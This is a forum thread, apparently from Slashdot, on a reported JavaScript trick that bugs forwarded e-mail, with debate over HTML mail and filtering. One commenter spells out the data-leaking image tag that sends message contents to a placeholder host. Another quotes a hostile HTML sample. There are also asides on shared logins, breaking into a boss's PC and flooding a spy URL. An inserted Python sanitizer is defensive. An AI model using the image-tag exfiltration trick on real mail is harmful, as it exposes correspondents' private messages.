New E-Mail Vulnerability - Trust Your Neighbor?
Anonymous Coward writes: "According to this article in The New York Times (free registration required), a trick enables someone to essentially bug an e-mail message so that the spy would be privy to any comments that a recipient might add as the message is forwarded to others or sent back and forth. The vulnerability could facilitate the harvesting of e-mail addresses. Widely used e-mail programs that are vulnerable to the exploit (because they enable JavaScript) include Microsoft Outlook, Outlook Express and Netscape 6." A snippet from the article: "The potential for such e-mail spying was first discovered by Carl Voth, an engineer in British Columbia. 'What bothers me is that in this case, my vulnerability is a function of what you do,' Mr. Voth said. 'I can be careful, I can take every precaution, I can turn off JavaScript, and it doesn't matter. If my neighbor isn't diligent and I send him an e-mail, I'm still vulnerable.'" "The Privacy Foundation, an educational and research organization based in Denver, plans to publicize and demonstrate the technique today."
It's a way to confirm the reading of a message.
Fight Spammers!
In 20+ years of emailing, I have only come across one situation where I was even tempted to send or receive anything remotely resembling HTML e-mail (namely 'rich text' color to clarify or emphasize variables or passages buried in group code) and even then I prefer MIME attachments.
Further, my primary mail program (Eudora 4.22) is set to "send plain text only" and "don't ask". If I reply to or forward an HTML e-mail, all HTML is stripped out *before* sending (I tested it with an array of HTML spam "from the wild")
This setting should be basic netiquette (for email programs so equipped - and the feature should be *expected* for e-mail programs) Alas, in a world where even the carriage return is considered a nicety, I don't hold out much hope.
If you don't/can't send javascript, the recipient can't carelessly mishandle it.
(I welcome any INFORMED, TESTED observations on the deficiencies of this method. One can never be too paranoid.)
Don't forget to disable HTML viewing of e-mail (Warning: often the provided check-box alone is not sufficient), and be stingy about what programs are permitted to access the usual HTTP ports. These are virtually painless security procedures. I can't recall ever being particularly inconvenienced by them.
sometimes the benefits of HTML mail are important.
Such as? Particularly when HTML these days also means scripting languages, embedded objects, etc.
There are already mail clients (Gnus for one) which parse informal markup - _underlining_, *bold*, /italic/ - delimited sigs and URLs in plain text messages without any of the bandwidth or security implications.
You can have your cake and eat it :)
>>>>truth; beauty; unix.<<<<
so long as the email calls back to the server (for a 1 pixel gif, for instance) this exploit will always exist. The trick is to turn off html altogether, and just read text email. Better still, use a "backward" email reader that can read only text. :-)
Whoever modded this up should be shot.
This idiot obviously didn't read the article and then got modded up again for being a gimboid!
That's a rather tough assessment of Javascript. It certainly has its flaws, but on the other hand, it has made a lot of interactive Web-based applications possible that wouldn't have been doable otherwise.
Javascript has been standardised by ECMA for some time. There have been many security issues, but it's not clear that alternative technologies for doing the same things would have been safer.
The difference between standing on the edge and falling off is a single step.
Enabling Javascript is like putting on a blindfold and running at full speed.
As you no doubt know, the no registration version of the article is here.
That said, just as with web gnats/bugs, invisible GIFs, and suchlike, there are many ways to avoid this:
1. Use PINE. Who needs graphics anyway?
2. Turn off all Java, Javascript, etc and view all emails as Text. Then use the Copy and Paste functions to forward only the From:, Subject:, and Date: fields in the email along with the body of the text.
3. If you want to forward pictures or attachments, save them to a file, and convert any DOC or other embedded files to a non-embedded format such as ASCII Text. Then create an email and attach those new files instead.
4. Hunt down and launch boycotts and similar actions against the creators of these things. Show no mercy.
5. Send a copy of all such spam to all your legislators - municipal, county, state, federal, president/etc. Send it with the attachments and javascript. Include your name and address in the forward so the spam software on their end will not put it in the spam box, and ask them what they will do about it. And send a copy to uce@ftc.gov for fun.
--- Will in Seattle - What are you doing to fight the War?
Surely the problem is not with HTML or Javascript in emails at all - it's more to do with the fact that email browsers have a poor (if any) security model.
One of the good things about client-side Java (rather than Javascript) is that it runs in a sandbox with a well defined security model that doesn't allow, for instance, content to be uploaded from the client machine unless you specifically say that that's OK by jumping through various hoops.
The post refers to two problems: firstly, Javascript making a connection from a client machine when the client user doesn't want that to happen, and secondly, mailreaders allow modifications (such as adding content) to an HTML document, but do not distinguish between the original copy and the modified one (by warning of embedded Javascript, or content stripping, or whatever).
The problem is more to do with client browsers having a crap security model rather than the idea of having HTML or Javascript in an email in itself.
I guess that most people who read or post to slashdot are happy with being able to use markups in their posts so they can italicise or embolden things or add links. HTML in text is a Good Thing here, are emails that different?
Active content is another step along the way, but I can't see that it is a Bad Thing, if the security model is good. I don't know enough about Javascript to comment about whether this is possible. Any comments?
I do believe that I agree with you that everyone should stick to non-HTML mail, but one HTML capability should be in all mail forms, and that is HTML links. I can't tell you how many relatives that I have that couldn't possibly figure out how to copy and paste something into their browser. Links are a necessity, but let's get rid of javascript and images right now.
----------
In a real emergency, we would have all fled in terror, and you would not have been notified.
You don't need to trust your neighbor, no matter what email client you use. If you don't want to trust your neighbor, just always reply in plain text (as opposed to HTML) no matter what format the message was sent in. Generate no HTML mail and you are not at risk from this exploit.
The DOM APIs are not "totally nonstandardized". In fact they have been standardized by the W3C. The APIs supported by Mozilla/Netscape6 are basically just a little less and a little more than W3C DOM2. Konqueror is catching up fast. Opera is lagging behind a bit but is basically on the same path.
Only Microsoft, and WinIE in particular, are deliberately avoiding proper support for the standard DOM. But the subset of the W3C DOM that works in IE 5.5 is actually quite large and very useful.
Use as user/pass combination a/a (or was aaaaa/aaaaa for sites that require longer pwds), that works for most sites.
Don't answer me. Moderate. Slashdot is about moderation, not discussion.
Here's a simple fix. Edit sendmail.cf.
Make a filter:
Any e-mail that comes to you with X-Mailer: Microsoft Outlook Express 5.50.4133.2400 or similar in the headers, gets relayed to /dev/null.
Soon, the Windows proles will realize that sending to you is fruitless and will eventually go away.
Okay, fine, it's not practical, but it would still be fun to do.
Or, you could use Outlook's many vulnerabilities to break into your boss's computer and change his Windows startup tune to this in order to prove the point.
He doesn't use Outcast any more. I consider that to be a victory.
Fire and Meat. Yummy.
My question is, why in the world does the browser have it turned on by default? The end-user should have to go out of his way to enable JavaScript in email, not the other way around.
---
where there's fish, there's cats
Oooh! That's a great idea. Let's go back to the glorious days of ASCII art, fixed width fonts, before the days you could use hyperlinks, or maybe back to the wonderful ASCII tables.
Although a great deal of the HTML features are utterly useless in an E-mail (e.g. scripting languages and JavaScript), sometimes the benefits of HTML mail are important.
Using pine IS a malay!
----
"Oh, bother," said Pooh, as he hid Piglet's mangled corpse.
That's all.
If I send the key for my front door in a transparent envelope, my doorlock is safe, the problem is my stupidity.
rr
Quidquid latine dictum sit, altum videtur.
*THIS* type of vulnerability is exactly one of the reasons that you should not be using HTML for email, particularly with the email clients that use an embedded browser window to display the information. Because not only do you as a malicious email sender gain access to the bugs that arise from the email client itself (eg the ability to email everyone in the address book from a script), but bugs inherited from the browser.
The email RFC says to stick to plain text for all messages, and if you do that, the only bugs that you will encounter will be those that are from the mailers, and it will be very hard to trigger security problems such as this. You might complain about losing formatting and such, but that's also why the Rich Text format was developed; it carries enough of the HTML formatting that some need to emphasize email but none of the deadweight that can trigger security and privacy violations. Unfortunately, RTF wasn't highly accepted and after MS did a nice 'embrace and extend' of it, it was pretty much worthless.
"Pinky, you've left the lens cap of your mind on again." - P&TB
"I can see my house from here!" - ST:
There's an option in Netscape to specifically turn off Javascript support for mail and news - under the Preferences->Advanced tab.
I've been using that as long as I can remember, mainly to prevent Usenet spam posts from launching browser windows and such. I guess now there's an even better reason for it.
Of course, for mail I use pine and tkrat in console and X respectively, so I don't really care much about this.
You live in a dull grey world.
I enjoy the soft glow of phosphorescent dots building the font's character.
I suspect you'd be happy in pre-reform Russia, where there was none of that annoying advertising or any bright colors on the street.
I suspect you live in Redmond, where Bill and his partners would never advertise you with any bright colors or loud music.
The Linux command prompt is a hairshirt of denial.
Whatever cranks your tractor.
Or at the very least a way to ensure mail you send or receive doesn't have Javascript. Use procmail to "DEFANG" the dangerous content of the email. This is a very good way of sanitizing email.
It may be kinda off this topic, but I somewhat like when a new program comes with all eye-candy enabled. That way, I can get quite a good orientation about what the program is capable of offering. Then, I slaughter it to fit my needs. It's a bit lazy, but it's quite convenient. Could of course stab you in the back if you assume that all gui features were shown...
Anyway, to somewhat come back on topic, showing off features of course shouldn't include anything that constitutes a security problem. In this case, I'd argue that the ideal case would have been a requester popping up the first time the program is run, quickly informing you about the availability of javascript and its advantages and risks, and asking you if you still wanted it.
The REAL question, IMHO, is of course 'why on earth would you want javascript in mail?', but that would be a troll, I guess.
-- Cure for Cancer instead of SETI! (only w32 yet - mail and beg)
David Martin, University of Denver
I've generally found text-based mail (mutt) to be much more time-efficient than GUI mail clients. I grind through a huge amount of mail each morning, and greatly benefit from the speed with which mutt moves from message to message.
However, I do miss one thing about 'rich mail' - the ability to use tables. Frequently a table expresses data best, but I'm not going to take the time to hand-build it in vi.
It was the marketers. The engineers originally called it Livescript but the marketers wanted to capitalize on the Java hype.
Anyone here work for Netscape? Their web-based mail has been down since sometime yesterday afternoon. Once you log in, you are forwarded to a page that claims they're upgrading their system.
Since most web sites handle planned upgrades w/o a 24 hour downtime, does this mean they shut the system down to fix the JavaScript bug? (And even if so, how long does it take to add code to parse out <SCRIPT> tags anyway?)
You can't study the darkness by flooding it with light. --Edward Abbey
...don't let friends send email with javascript...
It's 10 PM. Do you know if you're un-American?
Active content doesn't enhance the e-mail experience for most users, nor does it increase their productivity to any measurable extent. For most people, what is important is the actual *content*, the presentation is in most real-world cases a secondary, trivial issue.
Your assertion that "people don't want any extra time or hassle in their emails" has some validity. It's unfortunately in direct opposition to your main argument, however. HTML-based e-mail is larger, slower, potentially a hassle across a heterogeneous array of e-mail clients, and subject to security issues that simply aren't present in standard text-only e-mail.
On the other hand, your assertion that "(business types) are not concerned about privacy issues" is simply naive at best. It's a cutthroat world and business users have things like trade secrets and confidential information to worry about. And I would suspect that most people, in a business environment or otherwise, would like to believe that their e-mail correspondence is private. I'd even go so far as to bet that the majority of users actually *believe* their e-mail is private, and would be upset to find out otherwise.
Disabling HTML in e-mails is not the solution to anything, but your original message was so patently silly that it merited a response. People should simply be better informed about their privacy and the implications of using e-mail. E-mail clients should be proactive about incorporating encryption and other privacy-related methods into themselves to make it easier for people to protect themselves. PGP and its ilk are too much work and hassle for the average user.
omega_rob
Aha! He was aiming for "malady" and missed the 'd'. Sometimes the smallest things cause the biggest problems of comprehension.
Your right to not believe: Americans United for Separation of Church and
That's why I use PINE =) I seem to be un-touched by e-mail viruses, and other stuff heheheh
Here is the login-free URL
Javascript isn't Java, they aren't even related in any way.
You're right of course, that was a typo. Javascript is pure evil, while Java is only 90% evil.
--
Unless you consider javascript to be an integral part of html, which I don't.
Seems to me all the email problems stem from executable content, not formatting. An email client that honored basic html formatting tags w/out honoring javascript should be just fine.
Linux folks writing a new email client might be able to start w/Gecko and strip out the javascript support.
(BTW, I used to feel the same way about plain text email. When I'm at home, I use fetchmail and emacs gnus to sort my mail and score the messages and it is just too cool for school. BUT, I do like being able to indent and bullet and color and italicize and all that, and I wish emacs could do it, somehow.)
John.
That is the unfortunate truth to security; things are only as secure as the weakest link. I would argue that until the current state of email clients, usages, and so forth changes; we should have zero expectation of privacy in email. I would love to think [P]GP[G] will change the world in email privacy, but I suspect that Joe User will just get their key stolen through a javascript hole in their web browser (AKA mail client).
Matt
Don't take life so seriously; it isn't permanent.
/"\
:)
\ /
X ASCII Ribbon Campaign - Say NO to HTML in email
/ \
Originally created in Brazil by Tony de Marco
Better viewed in plain text
AOL's email client is not OE. It has inferior capabilities. Although many in this discussion apparently think that is a good thing.
----
"Oh, bother," said Pooh, as he hid Piglet's mangled corpse.
-- Give me ambiguity or give me something else!
Disabling javascript on your own system won't necessarily help. If you forward a bugged message to someone that has javascript turned on in their email client, you're still hosed.
But ... but ... but ... If I didn't have HTML e-mail capabilities, how could I subscribe to critical information ... like the daily "Foxtrot" which our local paper only carries on Sunday???? I mean, some things are IMPORTANT!
By the way, they mention Netscape Messenger 6 - are the older versions of Netscape (4.7x) immune? They do have the "Javascript on E-mail" switch, so one would assume they do something with it.
Teen Angel - a Ghost Story
Then when I received it, it must match the sender's IP address or I'll reject it.
What about if the sender is on dialup, or is at a different computer when they send the message?
This is nothing new to those of us running Windows... HELLO? Wakeup! Insecure systems are the way of the future! While all you folks have been happy in *NIX-land, the world has accepted the fact that vulnerability is the way of the future - in the future all systems will have advanced virus-enabling features, though I must admit, it will be a while before you *NIX freaks catch on to this new trend...
The society for a thought-free internet welcomes you.
I don't see how the JavaScript can send a command for the mail program to send the data back to the spy. Of course the JavaScript can read the whole HTML page (or email, same thing) and then display it back to you, but how does it get the message out to the spy? And they just simply removed that tricky bit out and said "Since we are nice, we prepared this particular wiretap so that it does not send email."
Actually now that I've thought about it, the code can just create an IMG tag and add the contents of the email to the SRC. So like this... <IMG SRC="http://www.somesite.com/PUTCONTENTSOFEMAILHERELALALALA"> .. afterwards the owner of somesite.com can just check his server logs to snoop on the email. Damn I just answered my own scepticism.. and showed the kiddies how to finish the exploit too. Well let them go to work, I wonder when the FBIs (or their equivalent here in DE) are going to knock on my door.
What time is it/will be over there? Check with my iPhone app!
@HOME hasn't had that vulnerability for over two years now. They had it for TWO MONTHS at the beginning of their service, then scrapped the modems that did it and went to a router based modem. But.. if you want to get @HOME, go right ahead.
The few features of HTML which are actually useful in email are properly used by selecting the Text/Enriched MIME format, see RFC1896.
Some mail gateways discard HTML before forwarding messages - more of them should.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Friends don't let friends enable ecmascript.
This is just one more reason in my list to continue *hating* HTML in email. I refuse to read email from someone that is composed of HTML---I will continue to do so.
[RE: the no-reg-required link for nytimes]
Does the DMCA not currently state that by violating an access control measure, or publishing information to violate an access control measure that you are committing a felony and may be subject to jail time and large fines?
You might want to be careful about being so helpful in the future. Let this be a lesson to all of us. Do not use such links for in doing them, you may commit a crime.
-- This batch of insanity brought to you from the letter C and your favorite federal government.
Why not create a mail filter in the SMTP server so that it will strip out any script from the HTML mail itself? This filter could even strip out "get" headers from images (yes I know that this isn't enough, but it sure helps).
So what I am suggesting is that a html mail that looks like this:
<html>
<body>
<script> nasty stuff </script>
<img onload="do nasty stuff" src="http://nasty.stuff.com/beatiful_image.jpg?email=john@doe.com">
</body>
</html>
could turn into this :
<html>
<body>
<img src="http://nasty.stuff.com/beatiful_image.jpg">
</body>
</html>
--
"take the red pill and you stay in wonderland and I'll show you how deep the rabbit hole goes"
[]'s Victor Bogado da Silva Lins
^[:wq
Washington DC News Channel 8 did a quick little spot for this just now on their evening news, leading the story with one of their computer icons with the words "Computer Hackers!" underneath it. Although "Hackers" weren't mentioned in the rest of the spot, the story did a predictable amount to "put the fear" into the consumer, and further blacken the name of true hackers everywhere.
They suggested disabling javascript in email (many times [redundantly] refuted here), as well as announced a patch from Microsoft. Doing the usual thorough job, they neglected to mention the forwarding vulnerability of this; something the Java disabling won't help.
And here I thought it was just a bug...good old media setting the record straight!
Heeeyyy...wait a minute.....
"These people look deep within my soul and assign me a number based on the order in which I joined" --Homer re:
This much has always been true in ANY private communication. The point of failure will always be what steps the recipient takes/doesn't take to protect that information. In order to communicate with another human being, this risk is inherent.
Singing "Paranoia may destroy yaaa..."
---"What did I say that sounded like 'Tell me about your day?'"---
I can be careful, I can take every precaution, I can turn off JavaScript, and it doesn't matter. If my neighbor isn't diligent and I send him an e-mail, I'm still vulnerable
For the extra paranoid, the solution here is not to forward the mail, but rather just copy and paste the text of the message into another message. This way the JavaScript doesn't get sent along with it.
If you were feeling especially feisty, I bet you could write some manner of filter that automatically strips the tags out of an email, preventing the scripts to operate on your machine, and preventing them from operating on other systems if you forward the message.
Besides, why would anyone here be forwarding email from someone who would do this?
Captain_Frisk
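The filter proposed earlier in the thread (strip <script>, onload and the image query string) and the tag-stripping filter suggested in the comment above, sketched in Python as an added example that is not code from any poster. It goes further than either suggestion by also dropping style, iframe, object, applet, embed and script-scheme URLs; the names defang, MailDefanger and clean_url are made up here, and SAMPLE is the HTML mail quoted in the earlier comment.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, urlunsplit

# Elements removed together with everything inside them. An unclosed one
# swallows the rest of the message, which fails closed.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "applet"}
DROP_TAG = {"embed", "base", "meta", "link"}   # void elements, tag only
URL_ATTRS = {"href", "src", "background", "action"}
FETCHED_ATTRS = {"src", "background"}          # loaded without a user click
BAD_SCHEMES = ("javascript:", "vbscript:", "data:")
NAME_OK = re.compile(r"[a-z][a-z0-9:-]*")


def clean_url(attr, value):
    """Return a safe version of a URL attribute, or None to drop it."""
    # Browsers ignore whitespace and control characters inside the scheme,
    # so remove them before comparing.
    compact = "".join(ch for ch in value if ch > " ").lower()
    if compact.startswith(BAD_SCHEMES):
        return None
    if attr in FETCHED_ATTRS:
        try:
            parts = urlsplit(value)
        except ValueError:
            return None
        # Drop query and fragment so the fetch cannot carry ?email=...
        # As the poster says, this is not enough on its own: the path can
        # still identify the recipient, so blocking remote loads is stronger.
        return urlunsplit((parts.scheme, parts.netloc, parts.path, "", ""))
    return value


class MailDefanger(HTMLParser):
    """Re-serialises HTML mail without active content (not a full sanitizer)."""

    def __init__(self):
        super().__init__()          # convert_charrefs=True: text is unescaped
        self.out = []
        self.removed = []
        self.skip_depth = 0

    def _start(self, tag, attrs, self_closing):
        if tag in DROP_WITH_CONTENT:
            if not self.skip_depth:
                self.removed.append(f"<{tag}>")
            # Browsers ignore "/>" on these elements, so always open a region.
            self.skip_depth += 1
            return
        if self.skip_depth or tag in DROP_TAG or not NAME_OK.fullmatch(tag):
            return
        kept = [tag]
        for name, value in attrs:
            if not NAME_OK.fullmatch(name):
                continue
            if name.startswith("on") or name == "style":
                self.removed.append(f"{tag} {name}")   # event handler / CSS
                continue
            if name in URL_ATTRS and value:
                value = clean_url(name, value)
                if value is None:
                    self.removed.append(f"{tag} {name}")
                    continue
            kept.append(name if value is None
                        else f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(kept) + (" /" if self_closing else "") + ">")

    def handle_starttag(self, tag, attrs):
        self._start(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        self._start(tag, attrs, True)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag not in DROP_TAG and NAME_OK.fullmatch(tag):
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))
    # Comments, doctype and processing instructions are not re-emitted.


def defang(html_text):
    """Return (cleaned_html, list_of_removed_items)."""
    parser = MailDefanger()
    parser.feed(html_text)
    parser.close()                  # flush any buffered trailing text
    return "".join(parser.out), parser.removed


# The HTML mail quoted earlier in the thread, used as sample input.
SAMPLE = """<html>
<body>
<script> nasty stuff </script>
<img onload="do nasty stuff" src="http://nasty.stuff.com/beatiful_image.jpg?email=john@doe.com">
</body>
</html>"""

if __name__ == "__main__":
    cleaned, removed = defang(SAMPLE)
    print(cleaned)
    print("removed:", removed)
```

Run on a relay or before forwarding, the cleaned body no longer carries the script downstream, which is the case where turning off JavaScript locally does not help.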
You don't need some technological trick to harvest emails. Just put up a web page with an inane joke, animated gif, etc. and include a button that says, "Email to a Friend!". Voila! You've just harvested the email addresses of everyone who received an email from anyone who thought the web page was even faintly amusing.
The only defence, until people start treating other peoples emails with more respect, is to keep two accounts. I personally only give out my work address, except to close and technically aware friends, at least then I get paid to read spam...
Waltz, nymph, for quick jigs vex Bud.
it's completely impossible to delete Outlook Express...
:-)
I've tried this also when I switched to Eudora.
Have you ever looked at your swap file and wondered what the heck was in it? Outlook Express AND Internet Explorer are always cached inside your swap file! Upon bootup, your Windows system looks to see if any essential programs are missing, and replaces them.
Seriously though, those files have to come from somewhere.
I think that HTML has its place in the email world, whether we like it or not. At work our help desk has to respond to emails from other internal departments where they are having trouble with something. And anyone who's tried to help out a friend who doesn't know too much about computers should realize that it's incredibly hard to use the phone or even a text email to convey how to do things.
Even the syntax Start -> Settings -> Control Panel -> Display Properties confuses most of them. So the solution that works is to put screenshots to illustrate how to do it. There really isn't any more elegant way short of physically finding the caller and working at his/her desk.
So agreed, we open up the security can of worms when we allow HTML. Perhaps there are solutions... non-HTML ways? Or only allowing internal email html to access resources (images) on the internal network? But many workplaces have important uses for the extra features with HTML, so instead of choosing the easy way out, (abolish HTML) perhaps we can find a better solution, if only out of necessity.
--
BACKNEXTFINISHCANCEL
Why is the need to register?
I can read cnn.com and bbc.co.uk for free.
Not to mention all news sites in Internet!
Get my e-mail after a captcha test in: http://tinymailt
Hrmm... no. He'd have to deliberately forward garbage for this to work, how many Pine (or Mutt, or Pmail, or...) users deliberately forward garbage? I certainly don't. That's a big part of why people choose these clients - to filter out the garbage.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Friends don't let friends enable ecmascript.
As you acknowledge, "a great deal of the HTML features are utterly useless in an E-mail." So why not educate others of this fact, instead of chopping it down to a black-and-white issue of all HTML or none at all.
Most users are not stupid, merely ignorant of some details. There is a difference, and much of this ignorance is due to techies that can't clearly express themselves.
Quick Disclaimer:
1. I agree that HTML that accesses the network is bad.
2. Javascript is also a big DUH!
3. I'm not a big MS advocate...
But, I'm surprised more email clients don't have the ability to turn off network access. In MS Entourage for MacOS, you can click a preference under Mail & News Preferences that reads, "Allow network access when displaying complex HTML". If you uncheck this, your email client won't display anything that isn't contained within the email message itself and it won't try to access the network.
Solving the problem...
The stuff you're complaining about has more to do with how html email is commonly (mis-)used than any intrinsic badness in html.
Wasted bandwidth, storage, slow loadtimes: all due to images.
Cruddy appearance in text interfaces: well, yeah, but I bet a minimal html editor that tried to preserve text format (or format the marked-up text to reflect how the markup will make it appear) could be written. (I'm thinking potential Linux html-based email clients.)
Interference of ads: images again.
Tracking user's habits: side-effect of handing off the html to a full-blown web browser for rendering. I don't think we need that.
Cross-platform compatibility: side effect of current crop of crappy html generators. If our hypothetical email client used nothing but xhtml/html 4.01, we'd be ok, yes?
Necessity of being connected: only if the html requests external resources. Images again. Why should we tolerate that? But... it's not an intrinsically bad thing about html, just how it's used.
Mail lists: well, yeah, but if minimal html clients became the norm, maybe that problem would be reduced. In the meantime, hey, save as text!
John.
http://www2.uclick.com/client/wpc/ft/
:)
...
or, look at most any major newspaper's website.
they make you accept a cookie, but so does Taco
anyhoo, i think i can deal with one stupid little cookie to read my strips for free...
at least it's not 'free registration'
Don't ask. Go see.
Java and JavaScript both suck when used with the web. Here is an explanation why.
From one RFC supporting HTML-email basher to another:
you have made the common mistake of confusing Microsoft's proprietary and ever-changing `Rich Text Format' (RTF) for documents with the open standard for formatting emails which is actually called `` Enriched Text.'' (That was supposed to be a demonstration of the Enriched Text tags)
If only Microsoft, Netscape et al supported the Enriched Text RFC instead of the stupid so-called `HTML email', then (almost) every one would be happy. And if only advocates of open standards could get their facts right...
Absolutely correct. But the point is that they both blow goats when implemented in email clients. As Beavis and Butthead point out - "You can't polish a turd."
Actually, they both blow goats in web sites too, but that's not relevant to the bit about turd-polishing or lusers who don't know the difference between a web browser and an email client ;)
I agree with you this is a bug not a feature, however, if you were not prepared to offer a non-buggy way to make the users who expect this happy, that might legitimately have earned you such an epithet.
Face it, the typical e-mail user these days does expect some formatting capabilities. There is a way to do this without diving into html-hell. See this. The Text/Enriched MIME format was designed to provide formatting capabilities that many users desire without the never-ending problems entailed by using HTML out of place. The makers of Pegasus Mail have taken a very usable approach to satisfy users desires with the minimal messiness on the other end - HTML messages incoming can be parsed internally with a minimal module that only understand the most commonly used and innocous tags, handed off to an external browser for parsing, or simply stripped to text. Formatted messages are normally sent using Text/Enriched, RTF is also available as an option (very useful if you know the recipient to be on a windows box.) So the pmail users can receive these annoying things and read them fine, but when they forward/reply they don't perpetuate the madness.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Friends don't let friends enable ecmascript.
It would be a great idea if someone would write up a subset of HTML as an RFC that could be used simply for text formatting (STRONG, BLOCKQUOTE, etc. - maybe even TABLE) for email use (and I would imagine there are many other uses, as well).
A Primary design criteria is that the results should be human readable. e.g. formatting with hard returns and short tags...
I seriously plan to start using it Real Soon Now(TM), but getting rid of the current ones (and redoing all the subscriptions etc etc) will be a PITA. Yeah, I'm lazy. Sue me.
Can you supply any more details?
Equally, there's also a 'u' in neighbour over here ;-)
Never forward messages. The 'evil' JavaScript isn't going to be in an email from your boss asking you to send him some report, is it? Quit forwarding those damn jokes and chain mails and get your lazy ass back to work. As someone who never forwards anything unsolicited to anybody, I don't see how this affects me and, quite honestly, I'm a little shocked that so much of the /. crowd does forward stuff. Aren't you guys just proliferating this shit?
:P
It just occurred to me that I can probably remove the 'Forward' button in Outlook (I love MS's cool modifiable toolbars). I'm going to go take that sucker out right now
The global economy is a great thing until you feel it locally.
Who labelled the parent of this message insightful? RTFA!
I use Outlook Express (flame me later), I have disabled all scripting AND only reply or forward in plain text (OE can be set up to do this by default). This way there is no forwarding of any scripts. I'm sure Outlook can be configured the same.
That will only work for e-mail YOU send. The JavaScript code will still be in the message, and when Joe Recipient gets the message, he won't have JavaScript turned off, so his reply/forward will be sent to the person who bugged the e-mail -- and if your message is quoted in the reply/forward, yours is sent too. So unless you can guarantee that every recipient of the message has JavaScript turned off, and everyone they send it to has it turned off, and so on, your privacy is at risk. It's like the reverse of a spread of a disease. Anyone downstream can affect the upstream people.
-----------
-----------
If you ever drop your keys into a river of molten lava, forget 'em, because man, they're gone. -- Jack
"... Instead of freaking out over every exploit that pops up and scrambling to get patches, I wonder why people don't use it as an opportunity to their own benefit for the greater good."
It's because it won't solve any problem. The spammers will switch to a more RFC-compliant email reader or turn off JS.
On another note, aggressive action has never fixed any problems in this world. You can shoot and imprison people, but it won't fix the root problem.
- Steeltoe
http://www.debunkingskeptics.com/
Although I am too lazy to go find the article, I remember Slashdot reporting on this several months ago. If I remember correctly, ssn1 (formerly HackerNewsNetwork) first publicized the story. An excellent FAQ on Web Bugs is available at:
http://www.privacyfoundation.org/education/webbug.html
Quit forwarding those damn jokes and chain mails and get your lazy ass back to work.
If you feel you need to forward that joke, feel free to write it up on Everything and forward the URL. Takes up a lot less bandwidth that way, and sending it as plain text excludes the possibility of malicious EcmaScripts.
Like Tetris? Like drugs? Ever try combining them?
Will I retire or break 10K?
What's a malay? I mean, other than a resident of Malaysia? Were you both aiming for "malaise", or what? Not that "malaise" would make any sense either...
Your right to not believe: Americans United for Separation of Church and
Even Hatelook (tho not Shitmail) knows to include plain text version and put the HTML mail as an attachment. And since I don't include attachments by default in a reply, I won't be forwarding this bug at all (unless I get it from a Hotmail account, which now has HTML only by default, in which case it DOES get forwarded... to /dev/null).
Boss of nothin. Big deal.
Son, go get daddy's hard plastic eyes.
Expanding a vast wasteland since 1996.
Two fucking words: bull shit.
:wq
That's Easy,
Given the example friend's email address is john@doe.com and your email is "mine@yob.com"
I modified my sendmail to automatically update the "From:" into "mine+john.doe.com@yob.com". Of course, it's different for each target email.
Then when I receive it, it must match the sender's IP address or I'll reject it.
To ensure protection against falsification, my address book is consulted for additional verification.
This enforces point-to-point and reverts back to the original intent by email philosophy and hopefully eliminates SPAM forever!
Cool, UH?
Think about it. If I were to write a corporate e-mail and try to spy, using this method, there is a decent chance that I would get caught. Would it be worth risking my job? On the other hand, spammers would love to use this method, but who forwards spam? Personally, if I caught somebody setting up a URL to capture javascript spying, I would fire a script that hit that URL a hundred times a minute. I would have the script grab random stuff off the web for content :-)
-Nuke the moon
Your neighbor could, of course, copy your message into another message with the Javascript.
Trust your spellchecker?
Gamingmuseum.com: Give your 3D accelerator a rest.
I've seen omissions / lacks of understanding of this scale and greater in the past few months in Times articles. Why is the newspaper of record getting worse in its technology reporting?
"Homo sum: humani nil a me alienum puto"
(I am a man: nothing human is alien to me)
My only political goal is to see to it that no political party achieves its goals.
But you're only safe if everyone else uses Pine, and everything they know uses, etc. Just need one java-enabled mail program in the link and everything's compromised
Javascript isn't Java, they aren't even related in any way. Java is the architecture-neutral, object-oriented, portable, distributed, robust and secure programming language created by Sun Microsystems that can be used to create applets or standalone applications. Javascript is a scripting language originally designed for embedding in browsers which was created by Netscape in a braindead attempt to win the browser wars which instead fragmented the HTML and brought major insecurity to the web.
Finally I doubt that any email clients are actually Java enabled (i.e. can launch applets, etc).
Grabel's Law
: has been given the status of a law...
If that's the case, then the business world should be one of the first communities demanding that javascript be stripped from all e-mail clients. Can you spell trade secret, as in leakage thereof, and the losses likely incurred as a result?
-- This
I agree with the statement that all the bloat and extra-non-standard thingies in Outlook are enabled by default... but do not forget *why* they did that: they know that Joe User does not know how to enable them but they want to show him eyecandy anyway (Joe User likes eyecandy). Why? That's simple: it makes the competition look "dull".
Joe User doesn't realise he is not complying to standards and pretty fast other Joe Users will see his flashy email client, want it, and use the non standard stuff: Voila... standards broken, Joe User happy (in his ignorance) and all nerds/geeks angry. It's the price of being a minority.
Ahhh...the great dumpster continuum. Many a free computer will be found there. -- sowth (748135)
forward this message to all your frends! Microsoft corp is going is conducting a test of email tracking software, will pay you $2500 for every message you forward. Intel, AOL, ICQ, and Disney corp are also somehow involved!
Heh, this I find interesting. I remember swearing up and down that getting a virus through email was impossible once, too.
ReadThe ReflectionEngine, a cyberpunk style n
I am extremely disheartened at this so-called "new" email exploit that has been in existence since Javascript enabled e-mail clients crawled out of their spawning pools. Big whoop. Besides, spamalicious webmasters and bulk mailers have been using those insidious 1 pixel by 1 pixel WEB BUGS to do exactly what this "new exploit" can do, all without requiring javascript.
The Sad Truth is that the Internet is a breeding ground for malicious applications of technology brought to bear against largely ignorant masses.
"The genes are the master programmers, and they are programming for their lives" - Richard Dawkins
...that Bill Gates can track how many people I forwarded that email to now? Gosh! I'm sure my check must be in the mail already.
--
As a matter of fact, I am a lawyer. But I play an actor on TV.
Then why bother? The information content is exactly the same whether you use text or html, but with text there is no chance of silly exploits like this. You gain exactly *nothing* by using html.
-- Give me ambiguity or give me something else!
I thought that AOL's email client was a port of OE. If that's so, then why is AOL immune to this security hole (a possible first)?
I know! Mutt is the TRUE answer.
He who knows not, and knows he knows not is a wise man
